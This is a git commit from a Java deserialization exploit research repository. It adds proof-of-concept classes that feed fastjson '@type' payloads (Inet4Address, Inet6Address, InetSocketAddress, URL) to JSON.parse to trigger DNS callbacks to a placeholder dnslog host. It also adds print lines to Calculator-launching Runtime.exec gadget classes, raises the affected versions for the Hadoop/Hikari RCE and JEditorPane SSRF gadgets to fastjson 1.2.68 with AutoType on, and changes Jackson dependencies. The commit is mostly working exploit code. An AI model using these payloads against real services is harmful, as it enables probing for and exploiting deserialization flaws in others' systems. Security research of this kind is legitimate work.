feat:添加一点点fastjson gadget

“threedr3am” · “threedr3am” · commit 1a71533a41e5 · 2020-03-25T12:58:42.000+08:00
diff --git a/common/src/main/java/Calc.java b/common/src/main/java/Calc.java
@@ -4,6 +4,7 @@
 public class Calc {
   static {
     try {
+      System.out.println("run Calc...");
       Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
     } catch (Throwable e) {
       e.printStackTrace();
diff --git a/common/src/main/java/CalcScriptEngineFactory.java b/common/src/main/java/CalcScriptEngineFactory.java
@@ -9,6 +9,7 @@ public class CalcScriptEngineFactory implements ScriptEngineFactory {
 
   public CalcScriptEngineFactory() {
     try {
+      System.out.println("run CalcScriptEngineFactory...");
       Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
     } catch (Throwable e) {
       e.printStackTrace();
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/Inet4AddressPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/Inet4AddressPoc.java
@@ -0,0 +1,18 @@
+package com.threedr3am.bug.fastjson.dns;
+
+import com.alibaba.fastjson.JSON;
+
+/**
+ * @author threedr3am
+ */
+public class Inet4AddressPoc {
+
+    public static void main(String[] args) {
+        String payload = "{\"@type\":\"java.net.Inet4Address\",\"val\":\"dnslog\"}";
+        try {
+            JSON.parse(payload);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+}
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/Inet6AddressPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/Inet6AddressPoc.java
@@ -0,0 +1,18 @@
+package com.threedr3am.bug.fastjson.dns;
+
+import com.alibaba.fastjson.JSON;
+
+/**
+ * @author threedr3am
+ */
+public class Inet6AddressPoc {
+
+    public static void main(String[] args) {
+        String payload = "{\"@type\":\"java.net.Inet6Address\",\"val\":\"dnslog\"}";
+        try {
+            JSON.parse(payload);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+}
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/InetSocketAddressPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/InetSocketAddressPoc.java
@@ -0,0 +1,18 @@
+package com.threedr3am.bug.fastjson.dns;
+
+import com.alibaba.fastjson.JSON;
+
+/**
+ * @author threedr3am
+ */
+public class InetSocketAddressPoc {
+
+    public static void main(String[] args) {
+        String payload = "{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"xxx.dns\"}, \"port\":80}";
+        try {
+            JSON.parse(payload);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+}
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/URLPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/URLPoc.java
@@ -0,0 +1,18 @@
+package com.threedr3am.bug.fastjson.dns;
+
+import com.alibaba.fastjson.JSON;
+
+/**
+ * @author threedr3am
+ */
+public class URLPoc {
+
+    public static void main(String[] args) {
+        String payload = "{{\"@type\":\"java.net.URL\",\"val\":\"http://xxx.dns\"}:\"aaa\"}";
+        try {
+            JSON.parse(payload);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+}
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/HadoopHikariPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/HadoopHikariPoc.java
@@ -5,7 +5,7 @@
 import com.threedr3am.bug.common.server.LdapServer;
 
 /**
- * fastjson <= 1.2.62 RCE，需要开启AutoType (report by threedr3am to ASRC)
+ * fastjson <= 1.2.68 RCE，需要开启AutoType (report by threedr3am to ASRC)
  *
  * <dependency>
  *       <groupId>org.apache.hadoop</groupId>
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/ssrf/JREJeditorPaneSSRFPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/ssrf/JREJeditorPaneSSRFPoc.java
@@ -5,7 +5,7 @@
 import com.threedr3am.bug.common.server.HTTPServer;
 
 /**
- * fastjson <= 1.2.66 RCE，需要开启AutoType（todo JRE自带依赖） (Discovered by threedr3am) 这个还是蛮好的gadget
+ * fastjson <= 1.2.68 RCE，需要开启AutoType（todo JRE自带依赖） (Discovered by threedr3am) 这个还是蛮好的gadget
  *
  * @author threedr3am
  */
diff --git a/jackson/pom.xml b/jackson/pom.xml
@@ -12,16 +12,7 @@
   <artifactId>jackson</artifactId>
 
   <properties>
-    <!--     CVE-2019-14379-->
-<!--    <jackson.version>2.9.9.1</jackson.version>-->
-
-    <!--     CVE-2019-20330-->
-<!--        <jackson.version>2.9.10.1</jackson.version>-->
-
-    <!--     CVE-2020-8840-->
-    <!--    <jackson.version>2.10.2</jackson.version>-->
-
-        <jackson.version>2.9.10.3</jackson.version>
+    <jackson.version>2.9.10.3</jackson.version>
   </properties>
 
   <dependencies>
@@ -127,7 +118,7 @@
       <version>1.5.1</version>
     </dependency>
 
-      <dependency>
+    <dependency>
       <groupId>org.apache.ignite</groupId>
       <artifactId>ignite-jta</artifactId>
       <version>2.8.0</version>
@@ -151,6 +142,17 @@
       <version>4.0.63</version>
     </dependency>
 
+    <dependency>
+      <groupId>org.jdom</groupId>
+      <artifactId>jdom</artifactId>
+      <version>1.1.3</version>
+    </dependency>
+    <dependency>
+      <groupId>org.jdom</groupId>
+      <artifactId>jdom2</artifactId>
+      <version>2.0.6</version>
+    </dependency>
+
 
   </dependencies>
 

Original file line number	Diff line number	Diff line change
`@@ -5,7 +5,7 @@`
`5`	`5`	`import com.threedr3am.bug.common.server.LdapServer;`
`6`	`6`
`7`	`7`	`/**`
`8`		`- * fastjson <= 1.2.62 RCE，需要开启AutoType (report by threedr3am to ASRC)`
	`8`	`+ * fastjson <= 1.2.68 RCE，需要开启AutoType (report by threedr3am to ASRC)`
`9`	`9`	`*`
`10`	`10`	`* <dependency>`
`11`	`11`	`* <groupId>org.apache.hadoop</groupId>`